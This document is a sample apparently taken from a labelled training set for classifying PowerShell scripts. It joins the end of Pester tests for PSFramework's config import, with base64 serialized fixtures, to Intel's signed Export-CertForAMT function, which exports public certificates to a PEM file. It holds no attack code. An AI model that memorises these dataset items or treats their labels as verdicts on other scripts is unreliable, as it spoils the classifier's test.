"Style": "Default"
}
]
'@
{ $json1 | Import-PSFConfig -IncludeFilter 'import-psfconfig.phase2.setting3', 'import-psfconfig.phase2.setting4' } | Should -Not -Throw
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting3' | Should -Be 3
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting4' | Should -Be 4
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting8' | Should -BeNullOrEmpty
{ $json2 | Import-PSFConfig -ExcludeFilter 'import-psfconfig.phase2.setting5', 'import-psfconfig.phase2.setting6', 'import-psfconfig.phase2.setting7' } | Should -Not -Throw
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting5' | Should -BeNullOrEmpty
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting6' | Should -BeNullOrEmpty
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting7' | Should -BeNullOrEmpty
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting9' | Should -Be 9
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting10' | Should -Be 10
}
}
Describe "The module cache feature import is working as designed" {
$module = Get-Module PSFramework | Sort-Object Version -Descending | Select-Object -First 1
$pathFileUserLocal = & $module { $path_FileUserLocal }
$pathFileUserShared = & $module { $path_FileUserShared }
$pathFileSystem = & $module { $path_FileSystem }
$json1 = @'
{
"FullName": "Import-PSFConfig.phase3.Setting1",
"Type": 3,
"Version": 1,
"Value": "42",
"Style": "Default"
}
'@
$json2 = @'
{
"FullName": "Import-PSFConfig.phase3.Setting2",
"Type": 3,
"Version": 1,
"Value": "23",
"Style": "Default"
}
'@
Set-Content -Path "$($pathFileUserLocal)\import-psfconfig-1.json" -Value $json1
Set-Content -Path "$($pathFileUserShared)\import-psfconfig-1.json" -Value $json2
It "Should import cached settings from the module cache" {
Import-PSFConfig -ModuleName 'Import-PSFConfig'
Get-PSFConfigValue 'import-psfconfig.phase3.setting1' | Should -Be 42
Get-PSFConfigValue 'import-psfconfig.phase3.setting2' | Should -Be 23
}
}
Describe "Imports successfully MetaJson Schema Configuration" {
$json1 = @'
{
"ModuleName": "MetaJson",
"Version": 1,
"Static": {
"Setting1": 42
},
"Object": {
"Setting3": "H4sIAAAAAAAEALVXW2/iOBh9X2n/A8oz5ELCVYBUYLqLBiia0Blp20prErd468SR7UzL/vp1EkIS4gTa1bRSC/b5rj4+tkd3u39Y4zukDBF/rBiqoeqqoTTePeyzsbLnPBhqGnP20ANM9ZBDCSPPXHWIpwXkTdjtIcZaW9ctTbeUye+/NRoj4bPxDT4v3LGiJ0NicLsujUWjE/vAOPRUYQMd/vA00raS2RtKwUE+lRhmc+LTOv24tHMWuayMLINCZoXxfJDFnTpHVMQh9LDwn0k+lRLyFmGYfKuHroDoHsDTg4h+XsWlKs8qTcDE5hT5L5M77Iq59FsOsaEkYMUIdmM9VtbAg0piZkumb0OME8hs+CiyCR4roRtAoc+VSYQqIaYR4ss7YpwJBA3hSJtKfHwjhMeh5CG+vHPoR3RVJiXAfBshZhQCLgBbFOXc1o1BS2+3DHNr6EO9N+x01W7P7LQH7ZbeH+r6SJtvL7m5507RU7/o6a8qJ0vA+I3jQMak2fSHlq6a/V67N6hPpuhHlk7OVW02Pyji8P8nc3Lz8VziZbzhgp67kEPBhdPeKi7oSDsn7GglJZ29AXyvTFYnedpE0mRH0qTOCIWP2ZYcDi9z2E5Y/AmnVQ5ne4Td6l0WSVOMm1P0EyqpHLWLclSQqtJcUVl88AI9UYN6E3LixTRWj+5lolQ0l4tRSXASo1RmZlLJiTFl2cl6Mwtp1OslceIk5cqRwY8yJAWkXaTkJ3IhPbXRLLcqcnfVykoDaSJSRX6V2pVB5pA5FAVJtXf2HLFXKXiNcARfgXfkhZ6N/hXE0CqrFmLlij4igE91W9K6MwpJ+3INjbJYMh4VfVRxKWlkiU+Jccqjj+Qh517sT86/fJPvGaQxtSQdzuM2gLE3Ql05rqxX6biUMEefggABBoeYOSW3cpfnMhiP3XetYymuMrHMjt4x+33THLRHmpiqxN9SKHZUp9+zjG6va4m/MvxIO1feUk2ZipV2YKdGyCQsvcjAo/9fpGTX6cJnxG7hBTiuRthtDwGsPF08D/guy90k05KrZeVPiIMIr9T3zsW4FUFVccO/JLMXZPB4ttk+CBZ+zUFZbbwibohhEuxj5qk4xg6kuljW2uo8ZiAAO4QRR9FtRJTNIW027D0JsSs6H926mo1MbVjNKpDjNTlSFPb4TN8g8j1Qd17FhzI77ZXuBdUu7aUUka77jGAsSC9KZkf+iy5BnBv/23h4uPamINpQg2yeno6meDeKX9GmEPOQwrEPQ04BbjY24Q4j5ys8bMkrFEBj92z2O13gml0Lmp2np19ziOTffoUJ0cfsElWh4zJjmYrL5FmijNNkpyzYjPgcIF9IY837J1ouZeK2oh/5hXIKGLx4m9wC+gL5iVe9Gg2WcE7Opz+gyB056lK84XIsSpSw2fCYQyhGu4wW1rW02PV6oON0usbAtKDeH8hp8TllF6t5ts6SNToqyhL5r7E0FywKx1/eOKNKOhr/Z5P/ANjaD5pZEQAA"
},
"Dynamic": {
"Setting2": "Foo: %COMPUTERNAME%"
}
}
'@
$json2 = @'
{
"Version": 1,
"Static": {
"MetaJson.Setting4": 42
},
"Object": {
"MetaJson.Setting5": "H4sIAAAAAAAEALVXW2/iOBh9X2n/A8oz5ELCVYBUYLqLBiia0Blp20prErd468SR7UzL/vp1EkIS4gTa1bRSC/b5rj4+tkd3u39Y4zukDBF/rBiqoeqqoTTePeyzsbLnPBhqGnP20ANM9ZBDCSPPXHWIpwXkTdjtIcZaW9ctTbeUye+/NRoj4bPxDT4v3LGiJ0NicLsujUWjE/vAOPRUYQMd/vA00raS2RtKwUE+lRhmc+LTOv24tHMWuayMLINCZoXxfJDFnTpHVMQh9LDwn0k+lRLyFmGYfKuHroDoHsDTg4h+XsWlKs8qTcDE5hT5L5M77Iq59FsOsaEkYMUIdmM9VtbAg0piZkumb0OME8hs+CiyCR4roRtAoc+VSYQqIaYR4ss7YpwJBA3hSJtKfHwjhMeh5CG+vHPoR3RVJiXAfBshZhQCLgBbFOXc1o1BS2+3DHNr6EO9N+x01W7P7LQH7ZbeH+r6SJtvL7m5507RU7/o6a8qJ0vA+I3jQMak2fSHlq6a/V67N6hPpuhHlk7OVW02Pyji8P8nc3Lz8VziZbzhgp67kEPBhdPeKi7oSDsn7GglJZ29AXyvTFYnedpE0mRH0qTOCIWP2ZYcDi9z2E5Y/AmnVQ5ne4Td6l0WSVOMm1P0EyqpHLWLclSQqtJcUVl88AI9UYN6E3LixTRWj+5lolQ0l4tRSXASo1RmZlLJiTFl2cl6Mwtp1OslceIk5cqRwY8yJAWkXaTkJ3IhPbXRLLcqcnfVykoDaSJSRX6V2pVB5pA5FAVJtXf2HLFXKXiNcARfgXfkhZ6N/hXE0CqrFmLlij4igE91W9K6MwpJ+3INjbJYMh4VfVRxKWlkiU+Jccqjj+Qh517sT86/fJPvGaQxtSQdzuM2gLE3Ql05rqxX6biUMEefggABBoeYOSW3cpfnMhiP3XetYymuMrHMjt4x+33THLRHmpiqxN9SKHZUp9+zjG6va4m/MvxIO1feUk2ZipV2YKdGyCQsvcjAo/9fpGTX6cJnxG7hBTiuRthtDwGsPF08D/guy90k05KrZeVPiIMIr9T3zsW4FUFVccO/JLMXZPB4ttk+CBZ+zUFZbbwibohhEuxj5qk4xg6kuljW2uo8ZiAAO4QRR9FtRJTNIW027D0JsSs6H926mo1MbVjNKpDjNTlSFPb4TN8g8j1Qd17FhzI77ZXuBdUu7aUUka77jGAsSC9KZkf+iy5BnBv/23h4uPamINpQg2yeno6meDeKX9GmEPOQwrEPQ04BbjY24Q4j5ys8bMkrFEBj92z2O13gml0Lmp2np19ziOTffoUJ0cfsElWh4zJjmYrL5FmijNNkpyzYjPgcIF9IY837J1ouZeK2oh/5hXIKGLx4m9wC+gL5iVe9Gg2WcE7Opz+gyB056lK84XIsSpSw2fCYQyhGu4wW1rW02PV6oON0usbAtKDeH8hp8TllF6t5ts6SNToqyhL5r7E0FywKx1/eOKNKOhr/Z5P/ANjaD5pZEQAA"
},
"Dynamic": {
"MetaJson.Setting6": "Foo: %COMPUTERNAME%"
}
}
'@
$json3 = @'
{
"Static": {
"Setting7": 42
},
"ModuleName": "MetaJson",
"Include": [
".\\MetaJson.include1.json",
".\\%COMPUTERNAME%\\MetaJson.include2.json"
],
"Version": 1
}
'@
$json4 = @'
{
"Static": {
"Setting7": 23
},
"ModuleName": "MetaJson",
"Version": 1
}
'@
$json5 = @'
{
"Dynamic": {
"%COMPUTERNAME%": 7
},
"ModuleName": "MetaJson",
"Version": 1
}
'@
Set-Content -Value $json1 -Path 'testdrive:\MetaJson1.json'
Set-Content -Value $json2 -Path 'testdrive:\MetaJson2.json'
Set-Content -Value $json3 -Path 'testdrive:\MetaJson3.json'
Set-Content -Value $json4 -Path 'testdrive:\MetaJson.include1.json'
$null = New-Item -Path 'testdrive:\' -Name $env:COMPUTERNAME -ItemType Directory
Set-Content -Value $json5 -Path "testdrive:\$($env:COMPUTERNAME)\MetaJson.include2.json"
It "Should import a plain file import with Modulename correctly" {
{ Import-PSFConfig -Path 'testdrive:\MetaJson1.json' -Schema MetaJson -EnableException } | Should -Not -Throw
Get-PSFConfigValue -FullName MetaJson.Setting1 | Should -Be 42
Get-PSFConfigValue -FullName MetaJson.Setting2 | Should -Be "Foo: $env:COMPUTERNAME"
(Get-PSFConfigValue -FullName MetaJson.Setting3).Name | Should -Be 'Old'
}
It "Should import a plain file import without Modulename correctly" {
{ Import-PSFConfig -Path 'testdrive:\MetaJson2.json' -Schema MetaJson -EnableException } | Should -Not -Throw
Get-PSFConfigValue -FullName MetaJson.Setting4 | Should -Be 42
Get-PSFConfigValue -FullName MetaJson.Setting6 | Should -Be "Foo: $env:COMPUTERNAME"
(Get-PSFConfigValue -FullName MetaJson.Setting5).Name | Should -Be 'Old'
}
It "Should import a file with include files correctly" {
{ Import-PSFConfig -Path 'testdrive:\MetaJson3.json' -Schema MetaJson -EnableException } | Should -Not -Throw
Get-PSFConfigValue -FullName MetaJson.Setting7 | Should -Be 23
Get-PSFConfigValue -FullName "MetaJson.$($env:COMPUTERNAME)" | Should -Be 7
}
}
}
|
combined_dataset/train/non-malicious/sample_45_32.ps1
|
sample_45_32.ps1
|
# Copyright (C) Intel Corporation, 2007 - 2019 All Rights Reserved.
Function Export-CertForAMT {
<#
.Synopsis
Exports certificates from the Windows Certificate Store for use by the IntelvPro PowerShell Module
.Description
Exports certificates from the Windows Certificate Store for use by the IntelvPro PowerShell Module.
.Link
http:\\vproexpert.com
http:\\www.intel.com\vpro
http:\\www.intel.com
.Example
Export-CertForAMT -DestinationPath:"c:\temp\certs.pem"
Completed exporting certificates
.Example
Export-CertForAMT -DestinationPath c:\temp\cert.pem -NoOutput $True
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory=$true,ValueFromPipelineByPropertyName=$true,ValueFromPipeline=$false, HelpMessage="Destination path")] [string] $DestinationPath,
[Parameter(Mandatory=$false,ValueFromPipelineByPropertyName=$true,ValueFromPipeline=$false, HelpMessage="Store Location")] [string] $StoreLocation,
[Parameter(Mandatory=$false,ValueFromPipelineByPropertyName=$true,ValueFromPipeline=$false, HelpMessage="Supress Output")] [bool] $NoOutput
)
PROCESS
{
$Results = @()
if($StoreLocation -eq "")
{
$StoreLocation = "Root"
}
$fs = New-Object System.IO.FileStream($DestinationPath,[System.IO.FileMode]::Create,[System.IO.FileAccess]::ReadWrite)
$store = New-Object System.Security.Cryptography.X509Certificates.X509Store($StoreLocation,[System.Security.Cryptography.X509Certificates.StoreLocation]::CurrentUser)
$store.Open([System.Security.Cryptography.X509Certificates.OpenFlags]::ReadOnly)
$CommaTok = New-Object System.String[] 1
$EqualTok = New-Object System.String[] 1
$CommaTok[0] = ","
$EqualTok[0] = "="
$CRLF = ([char]13).ToString() + ([char]10).ToString()
Foreach ($cert in $store.Certificates)
{
$name = $CRLF
$tokens = $cert.SubjectName.Name.Split($CommaTok,[System.StringSplitOptions]::None)
Foreach ($tok in $tokens)
{
$items = $tok.Split($EqualTok,[System.StringSplitOptions]::None)
if($items[0] -eq "CN")
{
$name = $items[1] + $CRLF
break
}
}
$raw = $cert.Export([System.Security.Cryptography.X509Certificates.X509ContentType]::Cert)
$b64Cert = [System.Convert]::ToBase64String($raw)
$formattedCert = New-Object System.Text.StringBuilder
for($i=0 ; $i -lt $b64Cert.Length; ++$i)
{
if($i % 64 -eq 0 -and $i -ne 0)
{
[void]$formattedCert.Append($CRLF)
}
[void]$formattedCert.Append($b64Cert[$i].ToString())
}
$b64Cert = $name + "-----BEGIN CERTIFICATE-----" + $CRLF + $formattedCert.ToString() + $CRLF + "-----END CERTIFICATE-----" + $CRLF + $CRLF
$exportCert = [System.Text.Encoding]::ASCII.GetBytes($b64Cert)
$fs.Write($exportCert, 0, $exportCert.Length);
}
$fs.Close()
if ($NoOutput -ne 1)
{
Write-Host "Completed exporting certificates"
}
}
}
# SIG # Begin signature block
# MIIo1wYJKoZIhvcNAQcCoIIoyDCCKMQCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCA9jOhq09elMHJS
# AVhQGM6k8gVlxG6HTVFOGcecys23KaCCEe8wggWIMIIEcKADAgECAhAK3oEU12eb
# Bm8tst/S9nrCMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAkdCMRswGQYDVQQI
# ExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoT
# D1NlY3RpZ28gTGltaXRlZDEkMCIGA1UEAxMbU2VjdGlnbyBSU0EgQ29kZSBTaWdu
# aW5nIENBMB4XDTIxMDQwNTAwMDAwMFoXDTIzMDQwNTIzNTk1OVowcDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFDASBgNVBAcMC1NhbnRhIENsYXJh
# MRowGAYDVQQKDBFJbnRlbCBDb3Jwb3JhdGlvbjEaMBgGA1UEAwwRSW50ZWwgQ29y
# cG9yYXRpb24wggGiMA0GCSqGSIb3DQEBAQUAA4IBjwAwggGKAoIBgQDjUVXd0eS2
# a1cJleh4bp6C5ngpid1fyZl3x1O7UH31slBxqjtjD45nsKBbDATVW/ZH0zqbLQ0P
# pQLpLbBVHEFasianjtLSjFXs1pJJ14rfuZCyiOaFFCGYqb/fLQ2ZBq/0riDFgwfC
# YS80SIV7V+hq+XJhpsUms/5QPqRilRnk+OPlbikQktkUVWi1qN7pkjkC5NgTDLnz
# oxGP3OYA6x+ac3/NMQYnRXzbjACLUq70L2hDC8sDwaCQXavaUG29FF4MjwE8MzMx
# DqcjpZmaO/jbTpExgMBfkDa+vqWSb99gdAeJI/JZXAeuYgGQ+66aIhwmRGsqQIXT
# z4ofo+mRQMgSXatXEOtuBrC5q5GZUnWTTrdfnkdxg0oD9CsttmZg6Fhu5mTLYbJ+
# lKrV/JtSjKNgtQdYXCtnV5FRRzlqcjXqsXG+Q1YaY/n0lTEwCAqJyRMyJLuK/S/U
# MUfPw9BvDQbpyB3ARSD4FJ3glwv9UDKd/BmQ2SVGpS+3/7whm633YIMCAwEAAaOC
# AZAwggGMMB8GA1UdIwQYMBaAFA7hOqhTOjHVir7Bu61nGgOFrTQOMB0GA1UdDgQW
# BBS5qxx6xBgtLKbRn3jrB6dtnHz6VDAOBgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/
# BAIwADATBgNVHSUEDDAKBggrBgEFBQcDAzARBglghkgBhvhCAQEEBAMCBBAwSgYD
# VR0gBEMwQTA1BgwrBgEEAbIxAQIBAwIwJTAjBggrBgEFBQcCARYXaHR0cHM6Ly9z
# ZWN0aWdvLmNvbS9DUFMwCAYGZ4EMAQQBMEMGA1UdHwQ8MDowOKA2oDSGMmh0dHA6
# Ly9jcmwuc2VjdGlnby5jb20vU2VjdGlnb1JTQUNvZGVTaWduaW5nQ0EuY3JsMHMG
# CCsGAQUFBwEBBGcwZTA+BggrBgEFBQcwAoYyaHR0cDovL2NydC5zZWN0aWdvLmNv
# bS9TZWN0aWdvUlNBQ29kZVNpZ25pbmdDQS5jcnQwIwYIKwYBBQUHMAGGF2h0dHA6
# Ly9vY3NwLnNlY3RpZ28uY29tMA0GCSqGSIb3DQEBCwUAA4IBAQBAdvRj4EEZ88QF
# gAGQZABeZB6XbzWNZaFrDGmZMTqREok2QqB6QxdyPSsAFEL5mVfwnD5f8F8iHx+W
# aZXjKHbSvn1f1CAMFMc/i7Byrr984Obp2raebwFNRUO7l2lewLCgkRBlb3+W7Hud
# eTGoTzhJL/Qcvy1jLT0VmhLJbvYjEpBuQ62z7MQH7HltsfjRnDu1RpqKsYWJuCt6
# tOSNn7MZ8vb5nsZEIqRoonucy4Yp1ItP/uXuLc4KcdLh+TzNUiXWWK6qQ6TqeeJp
# Z34IjoS1FvjXLV4ACypUuUvmEIq691NseI4ByVHCZyMa59A6Scpp+kadDUEw0LZj
# t9LGvtWIMIIF9TCCA92gAwIBAgIQHaJIMG+bJhjQguCWfTPTajANBgkqhkiG9w0B
# AQwFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNV
# BAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsx
# LjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkw
# HhcNMTgxMTAyMDAwMDAwWhcNMzAxMjMxMjM1OTU5WjB8MQswCQYDVQQGEwJHQjEb
# MBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRgw
# FgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJDAiBgNVBAMTG1NlY3RpZ28gUlNBIENv
# ZGUgU2lnbmluZyBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAIYi
# jTKFehifSfCWL2MIHi3cfJ8Uz+MmtiVmKUCGVEZ0MWLFEO2yhyemmcuVMMBW9aR1
# xqkOUGKlUZEQauBLYq798PgYrKf/7i4zIPoMGYmobHutAMNhodxpZW0fbieW15dR
# hqb0J+V8aouVHltg1X7XFpKcAC9o95ftanK+ODtj3o+/bkxBXRIgCFnoOc2P0tbP
# BrRXBbZOoT5Xax+YvMRi1hsLjcdmG0qfnYHEckC14l/vC0X/o84Xpi1VsLewvFRq
# nbyNVlPG8Lp5UEks9wO5/i9lNfIi6iwHr0bZ+UYc3Ix8cSjz/qfGFN1VkW6KEQ3f
# BiSVfQ+noXw62oY1YdMCAwEAAaOCAWQwggFgMB8GA1UdIwQYMBaAFFN5v1qqK0rP
# VIDh2JvAnfKyA2bLMB0GA1UdDgQWBBQO4TqoUzox1Yq+wbutZxoDha00DjAOBgNV
# HQ8BAf8EBAMCAYYwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHSUEFjAUBggrBgEF
# BQcDAwYIKwYBBQUHAwgwEQYDVR0gBAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBD
# oEGGP2h0dHA6Ly9jcmwudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZp
# Y2F0aW9uQXV0aG9yaXR5LmNybDB2BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKG
# M2h0dHA6Ly9jcnQudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENB
# LmNydDAlBggrBgEFBQcwAYYZaHR0cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkq
# hkiG9w0BAQwFAAOCAgEATWNQ7Uc0SmGk295qKoyb8QAAHh1iezrXMsL2s+Bjs/th
# AIiaG20QBwRPvrjqiXgi6w9G7PNGXkBGiRL0C3danCpBOvzW9Ovn9xWVM8Ohgyi3
# 3i/klPeFM4MtSkBIv5rCT0qxjyT0s4E307dksKYjalloUkJf/wTr4XRleQj1qZPe
# a3FAmZa6ePG5yOLDCBaxq2NayBWAbXReSnV+pbjDbLXP30p5h1zHQE1jNfYw08+1
# Cg4LBH+gS667o6XQhACTPlNdNKUANWlsvp8gJRANGftQkGG+OY96jk32nw4e/gdR
# EmaDJhlIlc5KycF/8zoFm/lv34h/wCOe0h5DekUxwZxNqfBZslkZ6GqNKQQCd3xL
# S81wvjqyVVp4Pry7bwMQJXcVNIr5NsxDkuS6T/FikyglVyn7URnHoSVAaoRXxrKd
# sbwcCtp8Z359LukoTBh+xHsxQXGaSynsCz1XUNLK3f2eBVHlRHjdAd6xdZgNVCT9
# 8E7j4viDvXK6yz067vBeF5Jobchh+abxKgoLpbn0nu6YMgWFnuv5gynTxix9vTp3
# Los3QqBqgu07SqqUEKThDfgXxbZaeTMYkuO1dfih6Y4KJR7kHvGfWocj/5+kUZ77
# OYARzdu1xKeogG/lU9Tg46LC0lsa+jImLWpXcBw8pFguo/NbSwfcMlnzh6cabVgw
# ggZmMIIETqADAgECAhMzAAAARLc//O9az6J6AAAAAABEMA0GCSqGSIb3DQEBBQUA
# MH8xCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS
# ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKTAnBgNVBAMT
# IE1pY3Jvc29mdCBDb2RlIFZlcmlmaWNhdGlvbiBSb290MB4XDTE1MDcyMjIxMDM0
# OVoXDTI1MDcyMjIxMDM0OVowgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpOZXcg
# SmVyc2V5MRQwEgYDVQQHEwtKZXJzZXkgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJU
# UlVTVCBOZXR3b3JrMS4wLAYDVQQDEyVVU0VSVHJ1c3QgUlNBIENlcnRpZmljYXRp
# b24gQXV0aG9yaXR5MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAgBJl
# FzYOw9sIs9CsVw127c0n00ytUINh4qogTQktZAnczomfzD2p7PbPwdzx07HWezco
# EStH2jnGvDoZtF+mvX2do2NCtnbyqTsrkfjib9DsFiCQCT7i6HTJGLSR1GJk23+j
# BvGIGGqQIjy8/hPwhxR79uQfjtTkUcYRZ0YIUcuGFFQ/vDP+fmyc/xadGL1RjjWm
# p2bIcmfbIWax1Jt4A8BQOujM8Ny8nkz+rwWWNR9XWrf/zvk9tyy29lTdyOcSOk2u
# TIq3XJq0tyA9yn8iNK5+O2hmAUTnAU5GU5szYPeUvlM3kHND8zLDU+/bqv50TmnH
# a4xgk97Exwzf4TKuzJM7UXiVZ4vuPVb+DNBpDxsP8yUmazNt925H+nND5X4OpWax
# KXwyhGNVicQNwZNUMBkTrNN9N6frXTpsNVzbQdcS2qlJC9/YgIoJk2KOtWbPJYjN
# hLixP6Q5D9kCnusSTJV882sFqV4Wg8y4Z+LoE53MW4LTTLPtW//e5XOsIzstAL81
# VXQJSdhJWBp/kjbmUZIO8yZ9HE0XvMnsQybQv0FfQKlERPSZ51eHnlAfV1SoPv10
# Yy+xUGUJ5lhCLkMaTLTwJUdZ+gQek9QmRkpQgbLevni3/GcV4clXhB4PY9bpYrrW
# X1Uu6lzGKAgEJTm4Diup8kyXHAc/DVL17e8vgg8CAwEAAaOB0DCBzTATBgNVHSUE
# DDAKBggrBgEFBQcDAzASBgNVHRMBAf8ECDAGAQH/AgECMB0GA1UdDgQWBBRTeb9a
# qitKz1SA4dibwJ3ysgNmyzALBgNVHQ8EBAMCAYYwHwYDVR0jBBgwFoAUYvsKIVt/
# Q24R2glUUGv10pZx8Z4wVQYDVR0fBE4wTDBKoEigRoZEaHR0cDovL2NybC5taWNy
# b3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljcm9zb2Z0Q29kZVZlcmlmUm9v
# dC5jcmwwDQYJKoZIhvcNAQEFBQADggIBAGsikzw9OVRxZGsO8uQ8MBHFIEpLhg+S
# 8f8zeTrZ5JinDkCgIoB+YbLgpxnPJpUxKmXUak8xhurAxi7FZIw9SFnNCy90PZQm
# ExBC1JeYJ148dtJ4aR0aZOcFcnXg62ZAQ5+PDEb/l2CmyGetEAibYqbpvjqK0wdN
# n3KTJbwGEeAskDg+Zxz9GdeekM49wuDnYazA5QT1HplUDJENAVZxN64n1J5DIqXJ
# J81N5XESOSSlQVaH/7xVFA8lyonux5fl0hP/PX4aoI8/yCzXo3DQx2DA/Ng+UeeX
# xj477c94vorK48Typ6ftnq4IAo+gUttyHtU7w02fjvqbcMf4479sP5Kb5Dc+7GqM
# KfnBor+LPhppZvscY08mAckCxD7S/8NDqBv9mfrUvKW54pMvOwHF0fQ6L2jD4GS3
# WpVeRswHg2m7PAWSVnM1c0WYTnzYEqW3QumiY/ZCYBhw0TtvMcCHx+Zx4fNGFun1
# uHKz6W0fYiZJo0mL3WjHi2hW9978+ockuAOBF4/l8WdqHa7TdPeMpV2zC45CKZbO
# ScR3fmZ8ARcabBQkw7AXdwXYGkC3hmvY5HtArH7fTm8k+SCAgowz5+X6Kdid2otw
# XSvJHYJMC2fLhEGe5wZ+EYNELYoZ7vR/mt15HDcZHp8/jCm6DVwQhjdsSM1FXc1w
# vLzRTV3Yxbh2MYIWPjCCFjoCAQEwgZAwfDELMAkGA1UEBhMCR0IxGzAZBgNVBAgT
# EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMP
# U2VjdGlnbyBMaW1pdGVkMSQwIgYDVQQDExtTZWN0aWdvIFJTQSBDb2RlIFNpZ25p
# bmcgQ0ECEAregRTXZ5sGby2y39L2esIwDQYJYIZIAWUDBAIBBQCgfDAQBgorBgEE
# AYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgorBgEEAYI3
# AgELMQ4wDAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQgyqGSjrf+isNuD3b6
# j3VWYtuuDTxof45oA3yzSMkz+oYwDQYJKoZIhvcNAQEBBQAEggGAXnNcOjRn7EYd
# z7o3IfnH17msBhbM3N3v/jz/D5TXkk57oIdI7EbkOpwqTtcQYCJKtuIaR1YCqLK1
# 4sQJcF1nUfqUjkLKwtoAVEcFFggcDyhGXuVbr97Crf8GNPbOoj4bJnRuKnvOII8E
# wYrM7JmG7YNgZsXjvkZDOCp4XlrQ6kLq8xpdjxechvI12i3RIk+xLVAGD5s04HXw
# m0AZTy/pVQAJixagh3GdJ4GtQLCy3tBKcOR8VaWbGDLAGD1PjzswdfaShWIKg+ch
# ay/bYlHITPTeZNGqv4QZxmcRRHSFqALQ8SNrO9UzpqImQgRS6VXDD9VMWDO0T6rr
# iz0r8BFn0roq9OemDSssXbtDBpRbFCRrWrc6PV1yjfnfNyWvoWtSDgUkr8SOOygu
# gKwF2FhbGPlmgSaF1b3ZkaqofXfqplz2ve5xwqRQrQDBSN7iftqbmOcmyzScp7Cw
# iTZgMoFAa/nVoX0flAWc+358cq1rQ80gZ5DwyV8o5uYt+MVm51lNoYITgDCCE3wG
# CisGAQQBgjcDAwExghNsMIITaAYJKoZIhvcNAQcCoIITWTCCE1UCAQMxDzANBglg
# hkgBZQMEAgIFADCCAQ0GCyqGSIb3DQEJEAEEoIH9BIH6MIH3AgEBBgorBgEEAbIx
# AgEBMDEwDQYJYIZIAWUDBAIBBQAEIKuZUsy1HwRkDoKT60YM4CB3Dbjt8a4ZAty4
# C6JDWX1LAhUAjntQ2OxA+AHawcBMYVwct6JFzvsYDzIwMjExMDI3MTIxMDE2WqCB
# iqSBhzCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3Rl
# cjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMSww
# KgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25lciAjMqCCDfsw
# ggcHMIIE76ADAgECAhEAjHegAI/00bDGPZ86SIONazANBgkqhkiG9w0BAQwFADB9
# MQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYD
# VQQHEwdTYWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMT
# HFNlY3RpZ28gUlNBIFRpbWUgU3RhbXBpbmcgQ0EwHhcNMjAxMDIzMDAwMDAwWhcN
# MzIwMTIyMjM1OTU5WjCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIg
# TWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBM
# aW1pdGVkMSwwKgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25l
# ciAjMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJGHSyyLwfEeoJ7T
# B8YBylKwvnl5XQlmBi0vNX27wPsn2kJqWRslTOrvQNaafjLIaoF9tFw+VhCBNToi
# Noz7+CAph6x00BtivD9khwJf78WA7wYc3F5Ok4e4mt5MB06FzHDFDXvsw9njl+nL
# GdtWRWzuSyBsyT5s/fCb8Sj4kZmq/FrBmoIgOrfv59a4JUnCORuHgTnLw7c6zZ9Q
# BB8amaSAAk0dBahV021SgIPmbkilX8GJWGCK7/GszYdjGI50y4SHQWljgbz2H6p8
